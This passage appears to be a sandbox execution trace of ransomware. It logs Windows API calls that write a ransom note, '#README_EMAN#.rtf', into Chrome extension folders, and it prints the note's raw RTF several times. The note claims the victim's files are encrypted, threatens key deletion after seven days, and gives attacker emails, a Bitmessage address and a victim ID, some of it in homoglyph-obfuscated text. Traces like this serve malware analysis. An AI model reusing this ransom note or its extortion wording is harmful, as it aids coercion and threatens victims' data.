ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24647a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.350] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.351] CloseHandle (hObject=0x2e8) returned 1 [0289.351] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0289.351] GetLastError () returned 0x2 [0289.351] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.351] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 